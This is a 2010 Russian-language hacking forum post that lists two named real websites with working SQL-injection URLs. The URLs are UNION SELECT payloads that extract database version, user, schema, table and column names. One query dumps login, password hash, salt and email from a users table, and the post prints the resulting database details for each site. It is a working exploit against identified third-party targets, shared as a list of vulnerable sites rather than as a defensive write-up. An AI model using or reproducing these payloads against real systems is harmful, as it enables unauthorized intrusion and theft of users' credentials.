ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 06.05.2010, 20:09
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.infotex.ru
ТИЦ: 80
PR: 4
Примеры запросов:
Код:
http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,column_name),3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),6,now(),8,9+from+information_schema.columns+where+table_name=0x7573657273--+  

http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,login,0x3a,hash,0x3a,salt),null,4,group_concat(0x0b,mail),6,now(),8,9+from+users--+
version - 5.1.36-log
user - fotoclub31_mysql@212.193.241.39
database - fotoclub31_computer31
os - portbld-freebsd7.2
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
ENGINES,   
EVENTS,   
FILES,   
GLOBAL_STATUS,   
GLOBAL_VARIABLES,   
KEY_COLUMN_USAGE,   
PARTITIONS,   
PLUGINS,   
PROCESSLIST,   
PROFILING,   
REFERENTIAL_CONSTRAINTS,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
SESSION_STATUS,   
SESSION_VARIABLES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
Product,   
Product2,   
Product3,   
all_Product,   
group_name,   
group_name_main,   
info_for_redact_infotex,   
info_for_redact_teny_mce,   
menu_left,   
new_Product,   
news,   
news_infotex,   
our_news,   
tehcentr,   
text_in_page,   
text_main_in_page,   
type_news_infotex,   
upd_price,   
users,   
vendor,   
Product,   
Product3,   
advice,   
albom_for_exhibition,   
author,   
beeline_galery,   
beeline_galery_ball_user,   
book_biblioteka,   
categories,   
club_cart_info,   
coment_advice,   
coment_personal_page,   
coment_photo_help,   
coment_reportage,   
comment_photo,   
comment_photo2,   
config,   
config_db,   
discussion_author_photo,   
exhibition,   
favorite_author_photo,   
for_del_photo,   
foto_blic_o
columns:

Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
ENGINE,   
SUPPORT,   
COMMENT,   
TRANSACTIONS,   
XA,   
SAVEPOINTS,   
EVENT_CATALOG,   
EVENT_SCHEMA,   
EVENT_NAME,   
DEFINER,   
TIME_ZONE,   
EVENT_BODY,   
EVENT_DEFINITION,   
EVENT_TYPE,   
EXECUTE_AT,   
INTERVAL_VALUE,   
INTERVAL_FIELD,   
SQL_MODE,   
STARTS,   
ENDS,   
STATUS,   
ON_COMPLETION,   
CREATED,   
LAST_ALTERED,   
LAST_EXECUTED,   
EVENT_COMMENT,   
ORIGINATOR,   
CHARACTER_SET_CLIENT,   
COLLATION_CONNECTION,   
DATABASE_COLLATION,   
FILE_ID,   
FILE_NAME,   
FILE_TYPE,   
TABLESPACE_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAM
========================================
Сайт: http://www.kazanclub.ru
ТИЦ: 20
PR: 0
Примеры запросов:
Код:
http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6--+  

http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,group_concat(0x0b,column_name),3,4,5,6+from+information_schema.columns--+
version - 5.1.41-log
user - kazanclu_rukazan@localhost
database - kazanclu_rukazanclub2
os - unknown-linux-gnu
tables:

Код:
CHARACTER_SETS, 
COLLATIONS, 
COLLATION_CHARACTER_SET_APPLICABILITY, 
COLUMNS, 
COLUMN_PRIVILEGES, 
ENGINES, 
EVENTS, 
FILES, 
GLOBAL_STATUS, 
GLOBAL_VARIABLES, 
KEY_COLUMN_USAGE, 
PARTITIONS, 
PLUGINS, 
PROCESSLIST, 
PROFILING, 
REFERENTIAL_CONSTRAINTS, 
ROUTINES, 
SCHEMATA, 
SCHEMA_PRIVILEGES, 
SESSION_STATUS, 
SESSION_VARIABLES, 
STATISTICS, 
TABLES, 
TABLE_
columns:

Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMER

Последний раз редактировалось aka_zver; 06.05.2010 в 20:38..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ